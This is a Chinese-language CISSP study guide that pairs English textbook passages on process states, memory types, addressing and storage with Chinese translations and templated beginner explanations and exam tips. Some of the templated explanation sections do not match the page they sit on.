授权:授权是认证之后决定你能访问什么、能做什么。

分层:分层把控制按层排列,让攻击者必须连续突破。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密、访问控制、分类、培训都常用于保护机密性。

哈希、数字签名、变更控制、输入校验常对应完整性。

认证成功不等于什么都能做;权限仍要单独授权。

serial controls 更深,parallel controls 更宽;题目会考深度和广度。

ISO 偏标准和管理体系。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
机密性 机密性让该看的人能看,不该看的人看不到。
完整性 完整性保证数据没有被未授权修改,并且仍然正确可信。
授权 授权是认证之后决定你能访问什么、能做什么。
分层 分层把控制按层排列,让攻击者必须连续突破。
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
学习单元 14 / PDF P557

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

Running The running state or problem state is when a process executes on the CPU and keeps going until it finishes, its time slice expires, or it is blocked for some reason (usually because it has generated an interrupt for I/O). If the time slice ends and the process isn't completed, it returns to the ready state; if the process is paused while waiting for I/O, it goes into the waiting state. Waiting The waiting state is when a process is ready for continued execution but is waiting for I/O to be serviced before it can continue processing.

Once I/O is complete, then the process typically returns to the ready state, where it waits in the process queue to be assigned time again on the CPU for further processing. Supervisory The supervisory state is used when the process must perform an action that requires privileges that are greater than the problem state's set of privileges, including modifying system configuration, installing device drivers, or modifying security settings. Basically, any function not occurring in the user mode (ring 3) or problem state takes place in the supervisory mode. This state is not shown in Figure 9.2, but it effectively replaces the running state when a process is run with higher-level privileges.

FIGURE 9.2 The life cycle of an executed process Stopped When a process finishes or must be terminated (because an error occurs, a required resource is not available, or a resource request can't be met), it goes into a stopped state. At this point, the OS can

中文直译 / 整理

运行 运行状态或问题状态是指进程在CPU上执行并持续运行,直到完成、时 间片用完或因某种原因被阻塞(通常是因为生成了I/O中断)。 如果时间片结 束但进程尚未完成,它将返回就绪状态; 如果进程在等待I/O时被暂停,它将 进入等待状态。 等待 等待状态 是指进程已准备好继续执行,但需要等待 I/O 操作完成才 能继续处理。 一旦 I/O 完成,进程通常会返回就绪状态,在进程队列中等 待再次被分配 CPU 时间以进行进一步处理。 监督 监督状态 用于进程必须执行需要比问题状态更高权限的操作时,包括 修改系统配置、安装设备驱动程序或修改安全设置。 基本上,任何不在用 户模式(环 3)或问题状态中执行的功能都发生在监督模式下。 此状态未 在 图 9.2 中显示,但在进程以更高权限运行时,它实际上替代了运行状态。 图 9.2 已执行进程的生命周期 已停止 当一个进程完成或必须被终止(因为发生错误、所需资源不可用或 无法满足资源请求)时,它会进入停止状态。 此时,操作系统可以

小白解释

场景先行:你是公司的安全负责人,正在读第 557 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

ISO:ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

ISO 偏标准和管理体系。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
ISO ISO 是国际标准化组织,常见安全管理体系如 ISO 27001/27002。
程序 程序是一步一步怎么做。
学习单元 15 / PDF P558

第 558 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

recover all memory and other resources allocated to the process and reuse them for other processes as needed. Figure 9.2 shows a diagram of how these various states relate to one another. New processes always transition into the ready state. When the OS decides which process to run next, it checks the ready queue and takes the highestpriority job that's ready to run. Memory The second major hardware component of a system is memory, the storage bank for information that the computer needs to keep readily available. There are many different kinds of memory, each suitable for different purposes, and we'll take a look at each in the sections that follow.

Read-Only Memory Read-only memory (ROM) works like the name implies—it's memory the system can read but can't change (no writing allowed). The contents of a standard ROM chip are burned in at the factory, and the end user simply cannot alter it. ROM chips often contain “bootstrap” information that computers use to start up prior to loading an OS from disk. This includes the power-on self-test (POST) series of diagnostics that run each time you boot a PC. ROM's primary advantage is that it can't be modified. This attribute makes ROM extremely desirable for orchestrating a computer's innermost workings. There is a type of ROM that may be altered to some extent.

It is known as programmable read-only memory (PROM), and its several subtypes: Programmable Read-Only Memory (PROM) A basic programmable read-only memory (PROM) chip is similar to a ROM chip in functionality, but with one exception. During manufacturing, a PROM chip's contents aren't “burned in” at the factory as with standard ROM chips. Instead, a PROM incorporates special functionality that allows an end user to burn in the chip's contents later. Once data is written to a PROM chip, no further changes are possible.

Erasable Programmable Read-Only Memory (EPROM) EPROM combines the relatively high cost of PROM chips and software developers' inevitable desire to tinker with their code once it's written. You then have the rationale for the development of erasable PROM

中文直译 / 整理

回收分配给该进程的所有内存和其他资源,并根据需要将这些资源重新用 于其他进程。 图 9.2展示了这些不同状态之间的相互关系。 新进程总是进入就绪状态。 当操 作系统决定下一个运行哪个进程时,它会检查就绪队列,并选取优先级最高的 就绪任务。 内存 系统的第二个主要硬件组件是内存,它是计算机用来存放需要随时访问的信息 的存储单元。 内存有多种不同类型,每种都适用于不同的用途,我们将在接下 来的章节中逐一介绍。 只读存储器 只读存储器(ROM)的工作方式与其名称相符——系统可以读取其中的内容, 但无法更改(不允许写入)。 标准ROM芯片的内容在出厂时已被固化,终端 用户无法修改。 ROM芯片通常包含计算机在从磁盘加载操作系统之前用于启 动的“引导”信息,其中包括每次启动PC时运行的加电自检(POST)诊断序 列。 ROM的主要优势在于它无法被修改。 这一特性使ROM在协调计算机最底层操作时 极为理想。 有一种ROM可以在一定程度上被修改,它被称为可编程只读存储器(PRO M),其若干子类型包括: 可编程只读存储器(PROM) 基本的 可编程只读存储器(PROM)芯片在功能上与ROM芯片相似,但有一个例 外。

在制造过程中,PROM芯片的内容不会像标准ROM芯片那样在工厂中 “固化”。 相反,PROM内置了特殊功能,允许最终用户在之后固化芯片 内容。 一旦数据写入PROM芯片,就无法再进行任何更改。 可擦除可编程只读存储器(EPROM) EPROM 结合了 PROM 芯片相对较 高的成本以及软件开发人员在代码写入后不可避免地想要修改代码的愿望。 于是,就有了开发可擦除PROM的理由

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

标准:标准给出必须满足的最低要求。

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 558 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Minimum level、mandatory requirement 常对应 standard。

IPS 放在线路中,误报可能影响可用性。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
标准 标准给出必须满足的最低要求。
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 16 / PDF P559

第 559 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

(EPROM). There are two main subcategories of EPROM: UVEPROM and EEPROM (see the next item). Ultraviolet EPROMs (UVEPROMs) can be erased with UV light. These chips have a small window that, when illuminated with a special ultraviolet light, causes the contents of the chip to be erased. After this process is complete, end users can burn new information into the UVEPROM as if it had never been programmed before. Electronically Erasable Programmable Read-Only Memory (EEPROM) A more flexible, friendly alternative to UVEPROM is electronically erasable PROM (EEPROM), which uses electric voltages delivered to the pins of the chip to force erasure.

Flash Memory Flash memory is a derivative concept from EEPROM. It is a nonvolatile form of storage media that can be electronically erased and rewritten. The primary difference between EEPROM and flash memory is that EEPROM can be erased and written at the byte level, whereas flash memory can be erased and written in blocks or pages. The most common type of flash memory is NAND flash. It is widely used in memory cards, thumb drives, mobile devices, and SSDs (solid-state drives). Random Access Memory Random access memory (RAM) is readable and writable memory that contains information a computer uses during processing. RAM retains its contents only when power is continuously supplied to it.

Unlike with ROM, when a computer is powered off, all data stored in RAM disappears. For this reason, RAM is useful only for temporary storage. Critical data should never be stored solely in RAM; a backup copy should always be kept on another storage device to prevent its disappearance in the event of a sudden loss of electrical power. The following are types of RAM: Real Memory Real memory (also known as main memory or primary memory) is typically the largest RAM storage resource available to a computer. It is normally composed of a number of dynamic RAM chips and, therefore, must be refreshed by the CPU periodically (see the sidebar “Dynamic vs.

Static RAM” for more information on this subject). Cache RAM Computer systems contain many caches that improve performance by taking data from slower devices and temporarily storing it in faster devices when repeated use is likely; this is cache RAM. The (EPROM)。EPROM

中文直译 / 整理

有两个主要子类别:UVEPROM 和 EEPROM (见下一项)。 紫外线EPROM(UVEPROM) 可以通过紫外线擦除。 这 些芯片有一个小窗口,当用特殊的紫外线照射时,芯片的内容会被擦除。 此过程完成后,最终用户可以像对待从未编程过的芯片一样,将新信息写 入 UVEPROM。 电子可擦除可编程只读存储器(EEPROM) 一种比UVEPROM更灵活、 更友好的替代方案是电子可擦除PROM(EEPROM),它通过向芯片引脚 施加电压来强制擦除数据。 闪存 闪存 是从EEPROM衍生出的概念。 它是一种非易失性存储介质,可以 电子擦除和重写。 EEPROM与闪存的主要区别在于,EEPROM可以按字节 级别擦除和写入,而闪存只能按块或页进行擦除和写入。 最常见的闪存类型 是NAND闪存。 它广泛应用于存储卡、U盘、移动设备和SSD(固态硬盘) 中。 随机存取存储器 随机存取存储器(RAM) 是一种可读可写的内存,包含计算机在处理过程中 使用的数据。 RAM仅在持续供电时保留其内容。 与ROM不同,当计算机断电 时,RAM中存储的所有数据都会消失。 因此,RAM仅适用于临时存储。 关键 数据绝不能仅存储在RAM中;

为防止突然断电导致数据丢失,必须始终在其 他存储设备上保留备份副本。 以下是RAM的类型: 实内存 实内存(也称为主内存或主存储器)通常是计算机可用的最大RA M存储资源。 它通常由多个动态RAM芯片组成,因此必须由CPU定期刷新 (有关此主题的更多信息,请参见侧边栏“动态RAM与静态RAM”)。 缓存RAM 计算机系统包含许多缓存,这些缓存通过将来自较慢设备的数据临时存 储在较快设备中以提高性能,尤其是在可能重复使用的情况下; 这就是缓存RAM。 该

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

入侵防御系统 IPS:IPS 可检测并主动阻断恶意流量。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 559 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

IPS 放在线路中,误报可能影响可用性。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
入侵防御系统 IPS IPS 可检测并主动阻断恶意流量。
学习单元 17 / PDF P560

第 560 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

processor normally contains an onboard cache of extremely fast memory used to hold data on which it will operate. This can be referred to as L1, L2, L3, and even L4 cache (with the L being short for level). Many modern CPUs include up to three levels of on-chip cache, with some caches (usually L1 and/or L2) dedicated to a single processor core, whereas L3 may be a shared cache between cores. Some CPUs can involve L4 cache, which may be located on the mainboard/motherboard or on the GPU (graphics processing unit). Likewise, real memory often contains a cache of information pulled or read from a storage device.

Many peripherals also include onboard caches to reduce the storage burden they place on the CPU and OS. Many storage devices, such as hard disk drives (HDDs), solid-state drives (SSDs), and some thumb drives, contain caches to assist with improving read and write speed. However, these caches must be flushed to the permanent or secondary storage area before disconnection or power loss to avoid data loss of cache resident data.

中文直译 / 整理

处理器通常包含一个内置的超高速内存缓存,用于存放将要操作的数据。 这可以称为L1、L2、L3甚至L4缓存(其中L代表级别)。 许多现代CPU包 含最多三级片上缓存,其中一些缓存(通常是L1和/或L2)专用于单个处 理器核心,而L3可能是核心间共享的缓存。 一些CPU可能包含L4缓存,该 缓存可能位于主板上或GPU(图形处理器)上。 同样,实际内存中也常包 含从存储设备提取或读取的信息缓存。 许多外围设备还包含内置缓存,以减轻它们对CPU和操作系统的存储负担。 许 多存储设备,如硬盘驱动器(HDD)、固态驱动器(SSD)和某些U盘,都包 含缓存以帮助提高读写速度。 然而,在断开连接或断电之前,必须将这些缓存 刷新到永久或二级存储区域,以避免缓存中数据丢失。

小白解释

场景先行:你是公司的安全负责人,正在读第 560 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 560 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 18 / PDF P561

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Dynamic vs. Static RAM There are two main types of RAM: dynamic RAM and static RAM. Most computers contain a combination of both types and use them for different purposes. To store data, dynamic RAM uses a series of capacitors, tiny electrical devices that hold a charge. These capacitors either hold a charge (representing a 1 bit in memory) or do not hold a charge (representing a 0 bit). However, because capacitors naturally lose their charges over time, the CPU must spend time refreshing the contents of dynamic RAM to ensure that 1 bits don't unintentionally change to 0 bits, thereby altering memory contents.

Static RAM uses more sophisticated technology—a logical device known as a flip-flop, which to all intents and purposes, is simply an on/off switch that must be moved from one position to another to change a 0 to 1, or vice versa. More importantly, static memory maintains its contents unaltered as long as power is supplied and imposes no CPU overhead for periodic refresh operations. Dynamic RAM is cheaper than static RAM because capacitors are cheaper than flip-flops. However, static RAM runs much faster than dynamic RAM. This creates a trade-off for system designers, who combine static and dynamic RAM modules to strike the right balance of cost versus performance.

Registers The CPU also includes a limited amount of onboard memory, known as registers, that provide it with directly accessible memory locations that the brain of the CPU, the arithmetic-logical unit (ALU), uses when performing calculations or processing instructions. The size and number of registers vary, but typical CPUs have 8 to 32 registers and are often either 32 or 64 bits in size. In fact, any data that the ALU is to manipulate must be loaded into a register unless it is directly supplied as part of the instruction. The main advantage of this type of memory is that it is part of the ALU itself and, therefore, operates in lockstep with the CPU at typical CPU speeds. Memory Addressing

中文直译 / 整理

动态内存与静态内存 RAM主要有两种类型:动态RAM和静态RAM。 大多数计算机都同时包 含这两种类型,并将它们用于不同的目的。 为了存储数据,动态内存使用一系列电容器,这些是能够存储电荷的微小 电子设备。 这些电容器要么保持电荷(表示内存中的一个1位),要么不保 持电荷(表示一个0位)。 然而,由于电容器会自然地随时间流失电荷, CPU必须花费时间刷新动态内存的内容,以确保1位不会意外地变为0位, 从而改变内存内容。 静态内存使用更复杂的技术——一种称为触发器的逻辑器件,从实际用途来 看,它只是一个开关,必须从一个位置切换到另一个位置才能将0变为1, 或反之亦然。 更重要的是,只要持续供电,静态内存就能保持其内容不变, 且无需CPU进行周期性刷新操作,因此不产生额外开销。 动态内存比静态内存更便宜,因为电容器比触发器成本更低。 然而,静态 内存的运行速度远快于动态内存。 这为系统设计师带来了权衡:他们将静 态和动态内存模块结合使用,以在成本与性能之间取得最佳平衡。

寄存器 CPU 还包含少量的片上内存,称为 寄存器,这些寄存器为 CPU 的大脑——算 术逻辑单元(ALU)——提供了可直接访问的内存位置,用于执行计算或处理 指令。 寄存器的大小和数量各不相同,但典型的 CPU 通常有 8 到 32 个寄存器, 大小通常为 32 位或 64 位。 事实上,除非数据直接作为指令的一部分提供,否 则 ALU 要操作的任何数据都必须先加载到寄存器中。 这种内存的主要优势在于, 它本身就是 ALU 的一部分,因此能与 CPU 以典型的 CPU 速度同步运行。 内存寻址

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 19 / PDF P562

第 562 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

When using memory resources, the processor must have some means of referring to various locations in memory. The solution to this problem is known as memory addressing, and several different addressing schemes are used in various circumstances. The following are five of the most common addressing schemes: Register Addressing As you learned in the previous section, registers are small memory locations directly in the CPU. When the CPU needs information from one of its registers to complete an operation, it uses a register address (for example, “register 1”) to access its contents.

Immediate Addressing Immediate addressing is not a memory addressing scheme per se but rather a way of referring to data that is supplied to the CPU as part of an instruction. For example, the CPU might process the command “Add 2 to the value in register 1.” This command uses two addressing schemes. The first is immediate addressing—the CPU is being told to add the value 2 and does not need to retrieve that value from a memory location—it's supplied as part of the command. The second is register addressing; it's instructed to retrieve the value from register 1. Direct Addressing In direct addressing, the CPU is provided with an actual address of the memory location to access.

The address must be located on the same memory page as the instruction being executed. Direct addressing is more flexible than immediate addressing since the contents of the memory location can be changed more readily than reprogramming the immediate addressing's hard-coded data. Indirect Addressing Indirect addressing uses a scheme similar to direct addressing. However, the memory address supplied to the CPU as part of the instruction doesn't contain the actual value that the CPU is to use as an operand. Instead, the memory address contains another memory address.

The CPU reads the indirect address to learn the address where the desired data resides and then retrieves the actual operand from that address. Base+Offset Addressing Base+offset addressing uses a value stored in one of the CPU's registers or pointers as the base location to begin counting. The CPU then adds the offset supplied with the instruction to that base address and retrieves the operand from that computed memory location.

中文直译 / 整理

在使用内存资源时,处理器必须具备某种方式来引用内存中的不同位置。 解决 这一问题的方法称为 内存寻址,在不同情况下会使用多种不同的寻址方案。 以下是五种最常见的寻址方案: 寄存器寻址 如您在上一节所学,寄存器是CPU内部的小型内存位置。 当 CPU需要从其寄存器中获取信息以完成操作时,它会使用一个寄存器地址 (例如“寄存器1”)来访问其内容。 立即寻址 立即寻址本身并非一种内存寻址方案,而是一种将数据作为指令一 部分提供给CPU的方式。 例如,CPU可能处理命令“将2加到寄存器1的值上”。 此命令使用了两种寻址方案。 第一种是立即寻址——CPU被指示将值2相加, 而无需从内存位置检索该值——该值作为指令的一部分提供。 第二种是寄存 器寻址; 它被指示从寄存器1中检索值。 直接寻址 在直接寻址中,CPU被提供要访问的内存位置的实际地址。 该地 址必须位于与正在执行的指令相同的内存页上。 直接寻址比立即寻址更灵 活,因为内存位置的内容可以比重新编程立即寻址的硬编码数据更容易更 改。 间接寻址 间接寻址 使用一种与直接寻址相似的方案。 然而,作为指令一部 分提供给CPU的内存地址并不包含CPU要用作操作数的实际值。

相反,该内 存地址包含另一个内存地址。 CPU读取该间接地址以确定所需数据所在的位 置,然后从该地址检索实际的操作数。 基址+偏移寻址 基址+偏移寻址 使用存储在 CPU 的一个寄存器或指针中的 值作为计数的起始基地址。 CPU 然后将指令中提供的偏移量加到该基地址 上,并从该计算出的内存位置中获取操作数。

小白解释

场景先行:你是公司的安全负责人,正在读第 562 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

如果这一页没有明显术语,就按“谁在做事、保护什么、怕什么、用什么控制、留下什么证据”来拆。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 562 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解

本页没有识别到重点术语,按原文顺序理解即可。

学习单元 20 / PDF P563

第 563 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

A pointer is a basic element or object in many programming languages that is used to store a memory address. Basically, a pointer holds the address of something stored in memory so that when the program reads the pointer, it points to the location of the data actually needed by the application. Effectively, a pointer references a memory location. The act of accessing a pointer to read that memory location is known as dereferencing. Pointers can store the memory address used in direct, indirect, or base addressing. Another potential issue is a race condition, which occurs when a system or device tries to perform two or more operations at the same time.

This can cause null pointer errors in which an application dereferences a pointer that it expects to be valid but is really null (or corrupted), resulting in a system crash. Secondary Memory Secondary memory is a term commonly used to refer to magnetic, optical, or flash-based media or other storage devices that contain data not immediately available to the CPU. For the CPU to access secondary memory data, the OS must first read the data and store it in real memory. Virtual memory is a special type of secondary memory that is used to expand the addressable space of real memory.

The most common type of virtual memory is the pagefile or swapfile that most OSs manage as part of their memory management functions. This specially formatted file contains previously stored RAM data but not recently used in real memory. When the OS needs to access addresses stored in the pagefile, it checks to see whether the page is memory-resident (in which case it can access it immediately) or whether it has been swapped to disk, in which case it reads the data from disk back into real memory (this process is called paging). Virtual memory's primary drawback is that the paging operations that occur when data is exchanged between primary and secondary memory are relatively slow.

The need for virtual memory is reduced with larger banks of actual physical RAM, and the performance hit of virtual memory can be reduced by using flash media (NVMe [nonvolatile memory express] SSDs, SSDs, and USB flash drives) to host the virtual memory paging file. Data Storage Devices

中文直译 / 整理

一个 指针 是许多编程语言中的基本元素或对象,用于存储内存地址。 基本上,指针保存着存储在内存中某物的地址,这样当程序读取指针时,它 会指向应用程序实际需要的数据位置。 实际上,指针引用了一个内存位置。 访问指针以读取该内存位置的行为称为 解引用。 指针可以存储用于直接、间 接或基址寻址的内存地址。 另一个潜在问题是 竞争条件,当系统或设备尝试 同时执行两个或多个操作时,就会发生这种情况。 这可能导致空指针错误, 即应用程序解引用了一个它期望有效但实际上为 null(或已损坏)的指针, 从而导致系统崩溃。 辅助存储器 辅助存储器是一个常用术语,指磁性、光学或基于闪存的介质或其他存储设备, 这些设备包含CPU无法立即访问的数据。 要使CPU访问辅助存储器中的数据, 操作系统必须首先读取数据并将其存储到真实内存中。 虚拟内存是一种特殊的辅助存储器,用于扩展真实内存的可寻址空间。 最 常见的虚拟内存类型是页面文件或交换文件,大多数操作系统将其作为内存管 理功能的一部分进行管理。 这个特殊格式的文件包含之前存储但近期未在真实 内存中使用的RAM数据。

当操作系统需要访问页面文件中存储的地址时,它会 检查该页是否驻留在内存中(如果是,则可立即访问); 或者是否已被交换到 磁盘上,如果是,则从磁盘读取数据并重新加载到真实内存中(此过程称为分 页)。 虚拟内存的主要缺点是,在数据在主存和辅存之间交换时发生的分页操作相 对较慢。 增加实际物理内存的容量可以减少对虚拟内存的需求,而通过使用 闪存介质(NVMe [非易失性内存表达] SSD、SSD 和 USB 闪存驱动器)来 托管虚拟内存分页文件,可以减轻虚拟内存带来的性能损耗。 数据存储设备

小白解释

场景先行:你是公司的安全负责人,正在读第 563 页这一组概念。老板不会问你背定义,而是问:这件事会不会影响业务、谁负责、要不要花钱、出了事能不能解释清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:概念没放进业务场景,容易只背词,做题时不知道该选管理动作还是技术动作。

你作为负责人可以这样想:先确认业务目标和风险,再选控制措施,最后留下政策、审批、日志或证据。

本页术语用人话说:

程序:程序是一步一步怎么做。

常见误区:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

读完后用一句话复述:如果我是安全负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 563 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是安全负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

排除法提醒:不要一看到安全题就直接选最强工具;CISSP 更常考“在这个场景下谁该负责、下一步是什么”。

本页术语拆解
程序 程序是一步一步怎么做。
学习单元 21 / PDF P564

第 564 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Data storage devices are used to store information that may be used by a computer at any time after it's written. Primary vs. Secondary Primary memory, also known as primary storage, is the RAM that a computer uses to keep necessary information readily available to the CPU while the computer is running. Secondary memory (or secondary storage) includes all the familiar long-term storage devices you use often. Secondary storage consists of magnetic, optical, and flash media such as HDDs, SSDs, flash drives, magnetic tapes, CDs, DVDs, and flash memory cards. Volatile vs.

Nonvolatile The volatility of a storage device is simply a measure of how likely it is to lose its data when power is turned off or cycled. Devices designed to retain their data (such as magnetic media, flash media, ROMs, and optical media) are classified as nonvolatile, whereas devices such as static or dynamic RAM modules, which lose their data when power is removed, are classified as volatile. Random vs. Sequential Storage devices may be accessed in one of two fashions. Random access storage devices allow an OS to read (and sometimes write) immediately from any point within the device by using some type of addressing system. Almost all primary storage devices are random access devices.

